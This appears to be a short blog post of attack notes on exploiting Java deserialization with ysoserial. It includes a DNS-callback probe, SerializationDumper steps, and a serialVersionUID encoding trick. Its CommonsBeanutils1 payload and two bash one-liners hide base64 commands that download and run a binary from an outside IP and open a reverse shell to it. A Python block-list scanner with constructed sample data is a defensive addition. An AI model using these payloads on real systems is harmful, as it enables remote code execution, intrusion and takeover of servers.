XhstormR
Exploiting Java deserialization vulnerabilities

Updated on 2021-01-27

Probing (DNS callback):
java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://y8jhkk.dnslog.cn" > URLDNS.bin

Exploitation:
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "bash -c {echo,d2dldCAtcU8gMTdLNm9NQzUgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSBodHRwOi8vNDcuOTguMTM1LjY1OjgwODAvbGpDUHh6dDsgY2htb2QgK3ggMTdLNm9NQzU7IC4vMTdLNm9NQzU=}|{base64,-d}|{bash,-i}" > CommonsBeanutils1.bin

Dump to text format:
java -jar SerializationDumper-v1.13.jar -r CommonsBeanutils1.bin > CommonsBeanutils1.txt

Restore to a binary stream:
java -jar SerializationDumper-v1.13.jar -b CommonsBeanutils1.txt CommonsBeanutils1.ok.bin

Compute the serialized form of serialVersionUID -3490850999041592962 (busybox in cmd.exe; `^` is the cmd.exe line continuation):
busybox printf "%016x" -3490850999041592962 |^
busybox fold -w2 |^
busybox paste -sd" "
----
cf 8e 01 82 fe 4e f1 7e
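As an added example that is not part of the original post: the same serialVersionUID encoding in Python, plus a small scanner that pulls (class name, serialVersionUID) pairs out of a raw serialization stream so they can be matched against a block list during triage. The class name org.example.Gadget, the sample stream and the block list entry are constructed for the demo; the page does not say which class the computed serialVersionUID belongs to.

```python
import re
import struct

TC_CLASSDESC = 0x72

# Encode a serialVersionUID as the 8-byte big-endian two's-complement long that
# appears in a TC_CLASSDESC record (the value the busybox pipeline above computes).
def suid_bytes(suid: int) -> bytes:
    return struct.pack(">q", suid)

_CLASS_NAME = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$.]*$")

# Heuristic scan of a raw Java serialization stream: each TC_CLASSDESC is followed by
# the class name (u16 length + modified UTF-8) and the 8-byte serialVersionUID.
# It does not parse the full grammar, so treat it as a triage helper, not a decoder.
def class_descriptors(stream: bytes) -> list:
    found = []
    if stream[:4] != b"\xac\xed\x00\x05":  # STREAM_MAGIC + STREAM_VERSION
        return found
    i = 4
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            n = struct.unpack(">H", stream[i + 1:i + 3])[0]
            name = stream[i + 3:i + 3 + n]
            suid_raw = stream[i + 3 + n:i + 11 + n]
            if 0 < n < 256 and len(suid_raw) == 8 and _CLASS_NAME.match(name):
                found.append((name.decode("ascii"), struct.unpack(">q", suid_raw)[0]))
                i += 11 + n
                continue
        i += 1
    return found

# Keep only descriptors whose (class name, serialVersionUID) pair is on a block list.
def flag_known(stream: bytes, blocklist: dict) -> list:
    return [(name, suid) for name, suid in class_descriptors(stream)
            if blocklist.get(name) == suid]

# Constructed sample: a made-up class name carrying the serialVersionUID computed on
# this page, followed by an empty field list. Not a real ysoserial payload.
SAMPLE_NAME = b"org.example.Gadget"
SAMPLE_STREAM = (
    b"\xac\xed\x00\x05"                                            # STREAM_MAGIC, STREAM_VERSION
    + b"\x73"                                                      # TC_OBJECT
    + b"\x72" + struct.pack(">H", len(SAMPLE_NAME)) + SAMPLE_NAME  # TC_CLASSDESC + class name
    + suid_bytes(-3490850999041592962)                             # serialVersionUID
    + b"\x02\x00\x00"                                              # SC_SERIALIZABLE, 0 fields
    + b"\x78\x70"                                                  # TC_ENDBLOCKDATA, TC_NULL
)
BLOCKLIST = {"org.example.Gadget": -3490850999041592962}           # constructed entry
```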

Running the command from a shell (argument single-quoted):
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OC4xMzUuNjUvNDM5OSAwPiYx}|{base64,-d}|{bash,-i}'

Running the command from Java (no shell quoting):
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OC4xMzUuNjUvNDM5OSAwPiYx}|{base64,-d}|{bash,-i}
